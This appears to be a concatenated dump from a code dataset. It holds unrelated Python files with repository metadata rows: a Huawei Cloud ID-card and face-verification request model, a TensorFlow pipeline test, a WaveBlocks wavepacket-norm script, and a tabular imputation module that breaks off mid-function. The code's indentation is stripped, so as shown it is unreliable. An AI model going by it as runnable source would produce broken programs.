:param idcard_image1: The idcard_image1 of this ReqDataByIdCardImage.
:type: str
"""
self._idcard_image1 = idcard_image1
@property
def idcard_image2(self):
"""Gets the idcard_image2 of this ReqDataByIdCardImage.
        Image data of the national-emblem side of the ID card, base64 encoded; the base64-encoded size must not exceed 4 MB. Each side of the image must be between 300 and 4000 pixels; JPG format is supported.
:return: The idcard_image2 of this ReqDataByIdCardImage.
:rtype: str
"""
return self._idcard_image2
@idcard_image2.setter
def idcard_image2(self, idcard_image2):
"""Sets the idcard_image2 of this ReqDataByIdCardImage.
        Image data of the national-emblem side of the ID card, base64 encoded; the base64-encoded size must not exceed 4 MB. Each side of the image must be between 300 and 4000 pixels; JPG format is supported.
:param idcard_image2: The idcard_image2 of this ReqDataByIdCardImage.
:type: str
"""
self._idcard_image2 = idcard_image2
@property
def face_image(self):
"""Gets the face_image of this ReqDataByIdCardImage.
        Image data of the live face capture, base64 encoded; the base64-encoded size must not exceed 4 MB. Each side of the image must be between 300 and 4000 pixels; JPG format is supported.
:return: The face_image of this ReqDataByIdCardImage.
:rtype: str
"""
return self._face_image
@face_image.setter
def face_image(self, face_image):
"""Sets the face_image of this ReqDataByIdCardImage.
        Image data of the live face capture, base64 encoded; the base64-encoded size must not exceed 4 MB. Each side of the image must be between 300 and 4000 pixels; JPG format is supported.
:param face_image: The face_image of this ReqDataByIdCardImage.
:type: str
"""
self._face_image = face_image
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ReqDataByIdCardImage):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 29.221557
| 80
| 0.608402
|
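A short sketch of building the request model above from local image files; the file names are placeholders, and the base64 payloads must respect the size and resolution limits described in the property docstrings.
import base64
from huaweicloudsdkivs.v2.model.req_data_by_id_card_image import ReqDataByIdCardImage

def encode_image(path):
    # read an image file and return its base64-encoded contents as str
    with open(path, 'rb') as f:
        return base64.b64encode(f.read()).decode('utf-8')

req = ReqDataByIdCardImage(
    idcard_image1=encode_image('idcard_portrait_side.jpg'),  # required: portrait side
    idcard_image2=encode_image('idcard_emblem_side.jpg'),    # optional: national-emblem side
    face_image=encode_image('live_face.jpg'))                # required: live face capture
print(req.to_dict())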
10c539487b96af6a13903f27fc8edbdc94029828
| 5,435
|
py
|
Python
|
workflow/dags/tasks/preprocess/data_pipeline_utils_test.py
|
isabella232/driblet
|
2d51de919681deca1ca4cb483996c68587fd9ba8
|
[
"Apache-2.0"
] | 22
|
2019-07-09T08:57:37.000Z
|
2021-11-14T18:36:17.000Z
|
workflow/dags/tasks/preprocess/data_pipeline_utils_test.py
|
isabella232/driblet
|
2d51de919681deca1ca4cb483996c68587fd9ba8
|
[
"Apache-2.0"
] | 17
|
2019-12-16T22:01:23.000Z
|
2022-03-01T23:10:23.000Z
|
workflow/dags/tasks/preprocess/data_pipeline_utils_test.py
|
isabella232/driblet
|
2d51de919681deca1ca4cb483996c68587fd9ba8
|
[
"Apache-2.0"
] | 8
|
2019-11-03T20:11:33.000Z
|
2021-09-15T10:01:02.000Z
|
# coding=utf-8
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for data_pipeline_utils."""
import tempfile
import data_pipeline_utils as utils
import mock
import numpy as np
import tensorflow as tf
from tensorflow_metadata.proto.v0 import schema_pb2
from tensorflow_transform import coders as tft_coders
from tensorflow_transform.tf_metadata import dataset_schema
from google.protobuf import text_format
_TEST_SCHEMA = b"""
feature {
name: "id_col"
value_count {
min: 1
max: 1
}
type: INT
presence {
min_fraction: 1.0
min_count: 1
}
}
feature {
name: "cat_col1"
value_count {
min: 1
max: 1
}
type: BYTES
presence {
min_fraction: 1.0
min_count: 1
}
}
feature {
name: "num_col1"
value_count {
min: 1
max: 1
}
type: FLOAT
presence {
min_count: 1
}
}
"""
class DataPipelineUtilsTest(tf.test.TestCase):
def setUp(self):
super(DataPipelineUtilsTest, self).setUp()
self._schema = schema_pb2.Schema()
text_format.Parse(_TEST_SCHEMA, self._schema)
def test_make_transformed_key(self):
input_key = 'key'
expected_key = 'tr_key'
self.assertEqual(utils.make_transformed_key(input_key), expected_key)
def test_get_transformed_keys(self):
input_keys = ['key1', 'key2']
expected_keys = ['tr_key1', 'tr_key2']
self.assertListEqual(utils.get_transformed_keys(input_keys), expected_keys)
def test_get_raw_feature_spec_train_mode(self):
expected = {
u'cat_col1': tf.VarLenFeature(dtype=tf.string),
u'id_col': tf.VarLenFeature(dtype=tf.int64),
u'num_col1': tf.VarLenFeature(dtype=tf.float32)
}
actual = utils.get_raw_feature_spec(self._schema,
tf.estimator.ModeKeys.TRAIN)
self.assertDictEqual(actual, expected)
@mock.patch('data_pipeline_utils.features_config')
def test_get_raw_feature_spec_predict_mode(self, feature_config):
feature_config.TARGET_FEATURE = 'num_col1'
expected = {
u'cat_col1': tf.VarLenFeature(dtype=tf.string),
u'id_col': tf.VarLenFeature(dtype=tf.int64)
}
actual = utils.get_raw_feature_spec(self._schema,
tf.estimator.ModeKeys.PREDICT)
self.assertDictEqual(actual, expected)
def test_make_dataset_schema(self):
generated_dataset_schema = utils.make_dataset_schema(
self._schema, tf.estimator.ModeKeys.TRAIN)
self.assertIsInstance(generated_dataset_schema, dataset_schema.Schema)
def test_read_schema(self):
temp_schema_file = tempfile.NamedTemporaryFile(
dir=tempfile.mkdtemp(), delete=False)
temp_schema_file.write(_TEST_SCHEMA)
temp_schema_file.close()
expected_schema = schema_pb2.Schema()
text_format.Parse(_TEST_SCHEMA, expected_schema)
actual_schema = utils.read_schema(temp_schema_file.name)
self.assertEqual(actual_schema, expected_schema)
@mock.patch('data_pipeline_utils.features_config')
def test_make_csv_coder_train_mode(self, feature_config):
feature_config.TARGET_FEATURE = 'num_col1'
feature_config.ALL_FEATURES = ['id_col', 'cat_col1', 'num_col1']
# Assert that generated csv_coder is instance of tft_coders.CsvCoder.
csv_coder = utils.make_csv_coder(self._schema, tf.estimator.ModeKeys.TRAIN)
self.assertIsInstance(csv_coder, tft_coders.CsvCoder)
# Assert that csv_coder contains all feature columns.
expected_columns = feature_config.ALL_FEATURES
self.assertListEqual(csv_coder._column_names, expected_columns)
@mock.patch('data_pipeline_utils.features_config')
def test_make_csv_coder_predict_mode(self, feature_config):
feature_config.TARGET_FEATURE = 'num_col1'
feature_config.ALL_FEATURES = ['id_col', 'cat_col1', 'num_col1']
expected_columns = ['id_col', 'cat_col1']
csv_coder = utils.make_csv_coder(self._schema,
tf.estimator.ModeKeys.PREDICT)
# Assert that target column is removed from csv_coder column_names.
self.assertListEqual(csv_coder._column_names, expected_columns)
def test_replace_missing_values(self):
a = tf.constant([1.0], dtype=tf.float32)
b = tf.constant(['Test'], dtype=tf.string)
indices = [[0, 0]]
shape = [1, 1]
input_tensors = [
tf.SparseTensor(indices=indices, values=a, dense_shape=shape),
tf.SparseTensor(indices=indices, values=b, dense_shape=shape)
]
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
actual = [
sess.run(utils.replace_missing_values(tensor))
for tensor in input_tensors
]
expected = [
np.array([1.0], dtype=np.float32),
np.array([b'Test'], dtype=np.object)
]
self.assertListEqual(actual, expected)
if __name__ == '__main__':
tf.test.main()
| 31.783626
| 79
| 0.702484
|
2da953e587edb271e3d1bac9f36606b1a459fd33
| 2,044
|
py
|
Python
|
src/scripts/NormWavepacket.py
|
WaveBlocks/WaveBlocks
|
2af3730dcf27e54006ec602e696b4d4df25459d8
|
[
"BSD-3-Clause"
] | null | null | null |
src/scripts/NormWavepacket.py
|
WaveBlocks/WaveBlocks
|
2af3730dcf27e54006ec602e696b4d4df25459d8
|
[
"BSD-3-Clause"
] | null | null | null |
src/scripts/NormWavepacket.py
|
WaveBlocks/WaveBlocks
|
2af3730dcf27e54006ec602e696b4d4df25459d8
|
[
"BSD-3-Clause"
] | null | null | null |
"""The WaveBlocks Project
Compute the norms of the homogeneous wavepackets as well as the sum of all norms.
@author: R. Bourquin
@copyright: Copyright (C) 2010, 2011 R. Bourquin
@license: Modified BSD License
"""
from WaveBlocks import PotentialFactory
from WaveBlocks import HagedornWavepacket
def compute_norm(iom, blockid=0):
"""Compute the norm of a wavepacket timeseries.
:param iom: An ``IOManager`` instance providing the simulation data.
:param blockid: The data block from which the values are read.
"""
parameters = iom.load_parameters()
# Number of time steps we saved
timesteps = iom.load_wavepacket_timegrid(blockid=blockid)
nrtimesteps = timesteps.shape[0]
Potential = PotentialFactory().create_potential(parameters)
# Retrieve simulation data
params = iom.load_wavepacket_parameters(blockid=blockid)
coeffs = iom.load_wavepacket_coefficients(blockid=blockid)
# A data transformation needed by API specification
coeffs = [ [ coeffs[i,j,:] for j in xrange(parameters["ncomponents"]) ] for i in xrange(nrtimesteps)]
# We want to save norms, thus add a data slot to the data file
iom.add_norm(parameters, timeslots=nrtimesteps, blockid=blockid)
    # Hack to allow data blocks with a different basis size than the global one
    # todo: remove once we have local parameter sets
parameters.update_parameters({"basis_size": coeffs[0][0].shape[0]})
# Initialize a Hagedorn wavepacket with the data
HAWP = HagedornWavepacket(parameters)
HAWP.set_quadrature(None)
# Iterate over all timesteps
for i, step in enumerate(timesteps):
print(" Computing norms of timestep "+str(step))
# Configure the wave packet and project to the eigenbasis.
HAWP.set_parameters(params[i])
HAWP.set_coefficients(coeffs[i])
HAWP.project_to_eigen(Potential)
# Measure norms in the eigenbasis
norm = HAWP.get_norm()
# Save the norms
iom.save_norm(norm, timestep=step, blockid=blockid)
| 34.644068
| 105
| 0.720646
|
bb5614548721dbd02b47d773b87b828f419beb5a
| 30,511
|
py
|
Python
|
pred_diff/imputers/impute.py
|
PredDiff/PredDiffTabular
|
ae116c5179615d8163c1421e1feb7dcfbd1c2b5e
|
[
"BSD-3-Clause"
] | 1
|
2021-05-04T15:09:25.000Z
|
2021-05-04T15:09:25.000Z
|
pred_diff/imputers/impute.py
|
PredDiff/PredDiffTabular
|
ae116c5179615d8163c1421e1feb7dcfbd1c2b5e
|
[
"BSD-3-Clause"
] | null | null | null |
pred_diff/imputers/impute.py
|
PredDiff/PredDiffTabular
|
ae116c5179615d8163c1421e1feb7dcfbd1c2b5e
|
[
"BSD-3-Clause"
] | null | null | null |
import numpy as np
import pandas as pd
import scipy
import scipy.stats as st
from typing import List, Union
from tqdm.auto import tqdm
from sklearn.experimental import enable_iterative_imputer # noqa
from sklearn.impute import IterativeImputer as IterativeImputerOriginal
from .IterativeImputerPR import IterativeImputer as IterativeImputerPR
from ..tools.utils_bootstrap import empirical_bootstrap
# from ..tools.bootstrap_utils import empirical_bootstrap
from sklearn.ensemble import RandomForestRegressor, RandomForestClassifier, ExtraTreesRegressor, ExtraTreesClassifier
from sklearn.preprocessing import StandardScaler, RobustScaler, OrdinalEncoder, OneHotEncoder
from sklearn.dummy import DummyClassifier, DummyRegressor
##########################################################################################
#EVALUATION
##########################################################################################
def _eval_mean(predictions, weights=None, log_transform=False, n_train_samples=10000, n_classes = 10):
if(weights is None):
mean = predictions.mean(axis=1)
else:
mean = np.sum(predictions*weights, axis=1)/np.sum(weights, axis=1)
return mean
def evaluate_imputer(df,x,imputer_name=None,n_bootstrap=100,verbose=False):
'''evaluates imputers based on metrics from https://stefvanbuuren.name/fimd/sec-evaluation.html and some basic statistical tests
Parameters:
df: original dataframe
x: result of applying imputer to df
'''
res = []
for xi in x:
cols = [a for a in xi.columns if a not in ['id','imputation_id','sampling_prob']]
for c in cols:
imputations = np.stack(list(xi.groupby('id')[c].apply(lambda y: np.array(y))),axis=0)#n_samples,n_imputations
if("sampling_prob" in xi.columns):
sampling_probs =np.stack(list(xi.groupby('id')["sampling_prob"].apply(lambda y: np.array(y))),axis=0)
else:
sampling_probs = None
ground_truth = np.array(df[c])
mean_pred, bounds_low, bounds_high, _ = empirical_bootstrap(imputations if sampling_probs is None else (imputations,sampling_probs), _eval_mean, n_iterations=n_bootstrap)
raw_bias = np.abs(mean_pred- ground_truth)
percentage_bias = np.mean(np.abs(raw_bias/(ground_truth+1e-8)))
raw_bias = np.mean(raw_bias)
if(verbose):
print("\n\nimputed cols:",cols," var:",c,"dtype:",df[c].dtype)
print("for reference: mean",np.mean(ground_truth),"std",np.std(ground_truth))
print("mean raw bias:",np.mean(raw_bias))
print("mean percentage bias:",np.mean(percentage_bias))
#print(bounds_low[:3],bounds_high[:3],mean_pred[:3],ground_truth[:3])
coverage_rate = np.mean(np.logical_and(bounds_low <= ground_truth, ground_truth <= bounds_high))
average_width = np.mean(bounds_high-bounds_low)
rmse = np.sqrt(np.mean(np.power(ground_truth-mean_pred,2)))
try:
mwu = st.mannwhitneyu(ground_truth,mean_pred).pvalue #low p value: reject H0 that both are sampled from the same distribution
except:
mwu = np.nan #all identical
try:
wc= st.wilcoxon(ground_truth,mean_pred).pvalue
except:
wc = np.nan #Wilcoxon pvalue could not be calculated due to constant predictions
if(verbose):
print("coverage rate:",coverage_rate)
print("average width:",average_width)
print("rmse:",rmse)
print("Mann Whitney U pvalue:", mwu)
print("Wilcoxon pvalue:",wc)
res.append({"imputed_cols":cols,"var":c,"dtype":df[c].dtype,"gt_mean":np.mean(ground_truth),"gt_std":np.std(ground_truth),"pred_mean":np.mean(mean_pred),"pred_std":np.std(mean_pred),"raw_bias":raw_bias,"percentage_bias":percentage_bias,"coverage_rate":coverage_rate,"average_width":average_width,"rmse":rmse,"mann-whitney_u_p":mwu,"wilcoxon_p":wc})
df=pd.DataFrame(res)
if(imputer_name is not None):
df["imputer"]=imputer_name
return df
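# Added clarification (not in the original module): evaluate_imputer summarizes, per imputed
# column, the raw bias (mean |bootstrap-mean prediction - ground truth|), the percentage bias
# (bias relative to the ground truth), the coverage rate (fraction of ground-truth values that
# fall inside the bootstrap interval [bounds_low, bounds_high]), the average interval width,
# the RMSE of the bootstrap-mean prediction, and Mann-Whitney U / Wilcoxon p-values comparing
# the imputed means against the ground truth.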
##########################################################################################
# RFxxxSampling/ETxxxSampling
##########################################################################################
class RandomForestRegressorSampling(RandomForestRegressor):
'''RandomForestRegressor that samples from a Gaussian distribution based on mean/std of trees'''
def predict(self, X):
        #possibility to speed this up by mimicking the original predict #https://stackoverflow.com/questions/20615750/how-do-i-output-the-regression-prediction-from-each-tree-in-a-random-forest-in-p?rq=1
per_tree_pred = [tree.predict(X) for tree in self.estimators_]
sample_mean = np.mean(per_tree_pred,axis=0)
sample_std = np.std(per_tree_pred,axis=0)
return sample_mean+sample_std* np.random.randn(len(X))
class RandomForestClassifierSampling(RandomForestClassifier):
'''RandomForestClassifier that samples from the predict_proba multinomial distribution'''
def predict(self, X):
probs = self.predict_proba(X)
return np.array([np.where(np.random.multinomial(1, ps))[0] for ps in probs]).astype(np.int64)
class ExtraTreesRegressorSampling(ExtraTreesRegressor):
'''ExtraTreesRegressor that samples from a Gaussian distribution based on mean/std of trees'''
def predict(self, X):
        #possibility to speed this up by mimicking the original predict #https://stackoverflow.com/questions/20615750/how-do-i-output-the-regression-prediction-from-each-tree-in-a-random-forest-in-p?rq=1
per_tree_pred = [tree.predict(X) for tree in self.estimators_]
sample_mean = np.mean(per_tree_pred,axis=0)
sample_std = np.std(per_tree_pred,axis=0)
return sample_mean+sample_std* np.random.randn(len(X))
class ExtraTreesClassifierSampling(ExtraTreesClassifier):
    '''ExtraTreesClassifier that samples from the predict_proba multinomial distribution'''
def predict(self, X):
probs = self.predict_proba(X)
return np.array([np.where(np.random.multinomial(1, ps))[0] for ps in probs]).astype(np.int64)
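# Illustrative sketch (added, not part of the original module): the *Sampling estimators above
# make predict() stochastic, so calling it repeatedly on the same rows yields different draws,
# which is what allows multiple distinct imputations from a single fitted model. The helper
# below is a hypothetical, self-contained demonstration on synthetic data; it only runs when
# called explicitly.
def _example_sampling_predict():
    """Hypothetical demo of RandomForestRegressorSampling on synthetic data."""
    rng = np.random.RandomState(0)
    X = rng.randn(200, 3)
    y = X[:, 0] + 0.1 * rng.randn(200)
    reg = RandomForestRegressorSampling(n_estimators=20, random_state=0)
    reg.fit(X, y)
    # Two calls differ because predict() draws from N(mean over trees, std over trees) per row.
    first, second = reg.predict(X[:5]), reg.predict(X[:5])
    return first, second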
#########################################################################################
# Imputer Baseclass
#########################################################################################
class ImputerBase(object):
'''Imputer Base class; takes care of label encoding, standard scaling'''
def __init__(self, df_train, **kwargs):
self.df_train = df_train.copy()
self.kwargs = kwargs
self.exclude_cols = self.kwargs["exclude_cols"] if "exclude_cols" in self.kwargs.keys() else []
self.nocat_cols = self.kwargs["nocat_cols"] if "nocat_cols" in self.kwargs.keys() else []
#label-encode by default
label_encode = self.kwargs["label_encode"] if "label_encode" in self.kwargs.keys() else True
standard_scale = self.kwargs["standard_scale"] if "standard_scale" in self.kwargs.keys() else False
standard_scale_all = self.kwargs["standard_scale_all"] if "standard_scale_all" in self.kwargs.keys() else False
self.categorical_columns = [x for x in self.df_train.columns[np.where(np.logical_and(self.df_train.dtypes != np.float64,self.df_train.dtypes != np.float32))[0]] if not(x in self.exclude_cols)]
self.numerical_columns = [x for x in self.df_train.columns[np.where(np.logical_or(self.df_train.dtypes == np.float64,self.df_train.dtypes == np.float32))[0]] if not(x in self.exclude_cols)]
self.custom_postprocessing_fn = self.kwargs["custom_postprocessing_fn"] if "custom_postprocessing_fn" in kwargs.keys() else None
self.oe = {}
for c in self.categorical_columns if label_encode else []:
oe = OrdinalEncoder()
self.df_train[c] = oe.fit_transform(self.df_train[[c]].values)
self.oe[c] = oe
self.df_train_min = self.df_train.min()
self.df_train_max = self.df_train.max()
self.ss = {}
for c in self.categorical_columns+self.numerical_columns if standard_scale_all else (self.numerical_columns if standard_scale else []):
ss = RobustScaler()
self.df_train[c] = ss.fit_transform(self.df_train[[c]].values)
self.ss[c] = ss
self.imputer = None
def impute(self, df_test=None, impute_cols=None, n_imputations=100, return_reduced=True, retrain=False):
'''
returns a list of pandas dataframes one for each entry in impute_cols with columns
id: index
imputation_id: enumerates the different imputations 0...n_imputations-1
cols in entry from impute_cols: imputed values (or all values if return_reduced=True)
optional: sampling_prob: normalized or unnormalized sampling probabilities
'''
print(f'Imputing dataset with n = {len(df_test)} samples and {n_imputations} imputations')
if(impute_cols is None):
impute_cols = [[x] for x in self.df_train.columns if x not in self.exclude_cols]
df_test = self.df_train if df_test is None else self.preprocess(df_test.copy())
if(not(isinstance(impute_cols[0],list)) and not(isinstance(impute_cols[0],np.ndarray))):
impute_cols = [impute_cols]
res = self._impute(df_test=df_test, impute_cols=impute_cols, n_imputations=n_imputations, return_reduced=return_reduced, retrain=retrain)
return [self.postprocess(r) for r in res]
def _impute(self, df_test=None, impute_cols=None, n_imputations=100, return_reduced=True, retrain=False):
'''
internal imputation routine to be implemented by each specific imputer
'''
pass
def preprocess(self, df):
'''routine to be applied in derived classes '''
for c in self.oe.keys():
df[c] = self.oe[c].transform(df[[c]].values)
for c in self.ss.keys():
df[c] = self.ss[c].transform(df[[c]].values)
return df
def postprocess(self, df):
#round and truncate
for c in self.ss.keys():
if(c in df.columns):
df[c] = self.ss[c].inverse_transform(df[[c]].values)
for c in self.categorical_columns:
if(c in df.columns):
df[c] = df[c].astype(float).round(0).astype(int)
df[c] = df[c].clip(lower=self.df_train_min[c], upper=self.df_train_max[c])
for c in self.oe.keys():
if(c in df.columns):
df[c] = self.oe[c].inverse_transform(df[[c]].values)
#custom postprocessing
cols=[x for x in df.columns if x not in ["id","imputation_id","sampling_prob"]]
if(self.custom_postprocessing_fn is not None):
df[cols] = self.custom_postprocessing_fn(df[cols])
return df
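# Illustrative sketch (added, not part of the original module): the impute() contract documented
# above returns one dataframe per entry in impute_cols, keyed by "id" and "imputation_id". The
# hypothetical helper below shows the expected calling pattern with the TrainSetImputer defined
# further down; the column name "num_col" is a placeholder and nothing here runs at import time.
def _example_imputer_usage(df_train, df_test):
    """Hypothetical usage sketch for the ImputerBase API."""
    imputer = TrainSetImputer(df_train)  # any ImputerBase subclass works the same way
    imputed = imputer.impute(df_test=df_test, impute_cols=[["num_col"]], n_imputations=5)
    # imputed is a list with one dataframe per impute_cols entry,
    # here with columns ["id", "imputation_id", "num_col"].
    return imputed[0]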
###############################################################################################
# Imputer Implementations
###############################################################################################
class IterativeImputer(ImputerBase):
'''
simple imputer based on sklearn's IterativeImputer (uses regressor for all columns)
Parameters:
n_estimators: number of RF estimators
max_iter: maximum number of iterations in IterativeImputer
algorithm: RandomForest/ExtraTrees (standard implementation) or RandomForestSampling/ExtraTreesSampling (with stochastic sampling from a fitted tree)
'''
#c.f. https://github.com/scikit-learn/scikit-learn/pull/13025/files
def __init__(self, df_train, **kwargs):
super().__init__(df_train, **kwargs)
self.n_estimators = self.kwargs["n_estimators"] if "n_estimators" in self.kwargs.keys() else 100
self.max_iter = self.kwargs["n_iter"] if "n_iter" in self.kwargs.keys() else 10
self.algorithm = self.kwargs["algorithm"] if "algorithm" in self.kwargs.keys() else "RandomForestSampling"
self.n_jobs = self.kwargs["n_jobs"] if "n_jobs" in self.kwargs.keys() else -1
if(self.algorithm == "RandomForest"):
self.cls_regressor = RandomForestRegressor
elif(self.algorithm == "RandomForestSampling"):
self.cls_regressor = RandomForestRegressorSampling
elif(self.algorithm == "ExtraTrees"):
self.cls_regressor = ExtraTreesRegressor
elif(self.algorithm == "ExtraTreesSampling"):
self.cls_regressor = ExtraTreesRegressorSampling
else:
assert(False)
def _impute(self, df_test, impute_cols, n_imputations=100, return_reduced=True, retrain=False):
res=[[] for _ in range(len(impute_cols))]
include_cols = [x for x in self.df_train.columns if not x in self.exclude_cols]
integer_cols = self.df_train.columns[np.where(self.df_train.dtypes == np.int64)[0]]
for i in tqdm(list(range(1 if self.algorithm.endswith("Sampling") else n_imputations))):
#store one imputer
if(not(self.algorithm.endswith("Sampling")) or self.imputer is None or retrain is True):
self.imputer = IterativeImputerOriginal(self.cls_regressor(n_estimators=self.n_estimators,n_jobs=self.n_jobs),random_state=i, max_iter=self.max_iter, imputation_order="random")
self.imputer.fit(self.df_train[include_cols])
else:
print("Info: using trained imputer; pass retrain=True to retrain")
for k in tqdm(list(range(n_imputations)),leave=False) if self.algorithm.endswith("Sampling") else [1]:#only fit once for Samplers
for j,ic in enumerate(impute_cols):
df_test_tmp = df_test[include_cols].copy()
df_test_tmp[ic] = np.nan
df_test_tmp = pd.DataFrame(data=self.imputer.transform(df_test_tmp),columns=include_cols)
for c in self.exclude_cols:#restore excluded cols
df_test_tmp[c]=df_test[c]
df_test_tmp["imputation_id"]=k if self.algorithm.endswith("Sampling") else i #add imputation id
df_test_tmp["id"]=df_test_tmp.index
if(return_reduced):
df_test_tmp=df_test_tmp[["id","imputation_id"]+list(ic)]
res[j].append(df_test_tmp)
return [pd.concat(r) for r in res]
class IterativeImputerEnhanced(IterativeImputer):
'''
more elaborate imputer that can deal with categorical variables
c.f. https://github.com/scikit-learn/scikit-learn/pull/13025/files
Parameters:
n_estimators: number of RF estimators
max_iter: maximum number of iterations in IterativeImputer
algorithm: RandomForest/ExtraTrees (standard implementation) or RandomForestSampling/ExtraTreesSampling (with stochastic sampling from a fitted tree)
'''
def __init__(self, df_train, **kwargs):
super().__init__(df_train, **kwargs)
self.n_estimators = self.kwargs["n_estimators"] if "n_estimators" in self.kwargs.keys() else 100
self.max_iter = self.kwargs["n_iter"] if "n_iter" in self.kwargs.keys() else 10
self.algorithm = self.kwargs["algorithm"] if "algorithm" in self.kwargs.keys() else "RandomForestSampling"
self.n_jobs = self.kwargs["n_jobs"] if "n_jobs" in self.kwargs.keys() else -1
if(self.algorithm == "RandomForest"):
self.cls_regressor = RandomForestRegressor
self.cls_classifier = RandomForestClassifier
elif(self.algorithm == "RandomForestSampling"):
self.cls_regressor = RandomForestRegressorSampling
self.cls_classifier = RandomForestClassifierSampling
elif(self.algorithm == "ExtraTrees"):
self.cls_regressor = ExtraTreesRegressor
self.cls_classifier = ExtraTreesClassifier
elif(self.algorithm == "ExtraTreesSampling"):
self.cls_regressor = ExtraTreesRegressorSampling
self.cls_classifier = ExtraTreesClassifierSampling
else:
assert(False)
def _impute(self, df_test, impute_cols, n_imputations=100, return_reduced=True, retrain=False):
res=[[] for _ in range(len(impute_cols))]
impute_cols_flat = np.unique([item for sublist in impute_cols for item in sublist])
include_cols = [x for x in self.df_train.columns if not x in self.exclude_cols]
nonfloat_cols = list(self.df_train.columns[np.where(np.logical_and(self.df_train.dtypes != np.float64,self.df_train.dtypes != np.float32))[0]])
integer_cols = list(self.df_train.columns[np.where(self.df_train.dtypes == np.int64)[0]])
classification_cols = [x for x in nonfloat_cols if (x not in self.nocat_cols and x in include_cols)]
regression_cols = [x for x in include_cols if x not in classification_cols]
classification_cols_selected = [x for x in classification_cols if x in impute_cols_flat]
classification_cols_rest = [x for x in classification_cols if not x in impute_cols_flat]
regression_cols_selected = [x for x in regression_cols if x in impute_cols_flat]
regression_cols_rest = [x for x in regression_cols if not x in impute_cols_flat]
for i in tqdm(list(range(1 if self.algorithm.endswith("Sampling") else n_imputations))):
#store one imputer for later usage
if(not(self.algorithm.endswith("Sampling")) or self.imputer is None or retrain is True):
self.imputer = IterativeImputerPR(
estimator=[
(self.cls_classifier(n_estimators=self.n_estimators), classification_cols_selected),
(self.cls_regressor(n_estimators=self.n_estimators), regression_cols_selected),
(DummyClassifier(strategy="most_frequent"), classification_cols_rest),
(DummyRegressor(strategy="median"), regression_cols_rest),
],
transformers=[
(OneHotEncoder(sparse=False), classification_cols_selected),
(StandardScaler(), regression_cols)
],
initial_strategy="most_frequent",
n_jobs=self.n_jobs, max_iter=self.max_iter,imputation_order="random")
self.imputer.fit(self.df_train[include_cols])
else:
print("Info: using trained imputer; pass retrain=True to retrain")
for k in tqdm(list(range(n_imputations)),leave=False) if self.algorithm.endswith("Sampling") else [1]:#only fit once for Samplers
for j,ic in enumerate(impute_cols):
df_test_tmp = df_test[include_cols].copy()
df_test_tmp[ic] = np.nan
df_test_tmp = pd.DataFrame(data=self.imputer.transform(df_test_tmp),columns=include_cols)
for c in self.exclude_cols:#restore excluded cols
df_test_tmp[c]=df_test[c]
df_test_tmp["imputation_id"]=k if self.algorithm.endswith("Sampling") else i#add imputation id
df_test_tmp["id"]=df_test_tmp.index
if(return_reduced):
df_test_tmp=df_test_tmp[["id","imputation_id"]+list(ic)]
res[j].append(df_test_tmp)
return [pd.concat(r) for r in res]
class TrainSetImputer(ImputerBase):
'''
imputer just inserts randomly sampled training samples
'''
def __init__(self, df_train, **kwargs):
kwargs["label_encode"]=False
kwargs["standard_scale"]=False
super().__init__(df_train, **kwargs)
def _impute(self, df_test, impute_cols, n_imputations=100, return_reduced=True, retrain=False):
res=[[] for _ in range(len(impute_cols))]
for i in tqdm(list(range(n_imputations))):
for j, ic in enumerate(impute_cols):
df_test_tmp = df_test.copy()
df_test_tmp[ic] = self.df_train[ic].sample(n=len(df_test_tmp)).values
df_test_tmp["imputation_id"] = i # add imputation id
df_test_tmp["id"] = range(len(df_test_tmp))
if(return_reduced):
df_test_tmp = df_test_tmp[["id", "imputation_id"]+list(ic)]
res[j].append(df_test_tmp)
return [pd.concat(r) for r in res]
class MedianImputer(ImputerBase):
'''
imputer just inserts the median of the training samples (all of them identical so n_imputations should be set to 1)
'''
def __init__(self, df_train, **kwargs):
kwargs["label_encode"]=False
kwargs["standard_scale"]=False
super().__init__(df_train, **kwargs)
def _impute(self, df_test, impute_cols, n_imputations=100, return_reduced=True, retrain=False):
res=[[] for _ in range(len(impute_cols))]
for i in tqdm(list(range(n_imputations))):
for j,ic in enumerate(impute_cols):
df_test_tmp = df_test.copy()
df_test_tmp[ic]=self.df_train[ic].median().values[0]
df_test_tmp["imputation_id"]=i
df_test_tmp["id"]=df_test_tmp.index
if(return_reduced):
df_test_tmp=df_test_tmp[["id","imputation_id"]+list(ic)]
res[j].append(df_test_tmp)
return [pd.concat(r) for r in res]
def _swap_axis(arr: np.ndarray, axis: Union[int, List[int]], dim: int = None, backward: bool = False) -> np.ndarray:
    """
    Iteratively swaps the given axes to the end of the matrix; arr.ndim must be 1 or 2.
    :param arr: square matrix, will be copied
    :param axis: list of integers, will be swapped to the end of the array
    :param dim: defines which dimensions to swap. If None, all dimensions will be swapped
    :param backward: perform the inverse swap
    :return: permuted matrix
    """
if isinstance(axis, list) is False:
assert isinstance(axis, int), f'axis = {axis} of incorrect type.'
axis = [axis]
assert arr.ndim == 1 or arr.ndim == 2, 'only vector or two-dimensional matrix allowed'
target_axis = (arr.shape[0] - np.arange(len(axis)) - 1).tolist()
dim_one = False
dim_two = False
if dim is None:
dim_one = True
if arr.ndim == 2:
dim_two = True
elif dim == 0:
dim_one = True
elif dim == 1: # only second axis will be swapped
dim_two = True
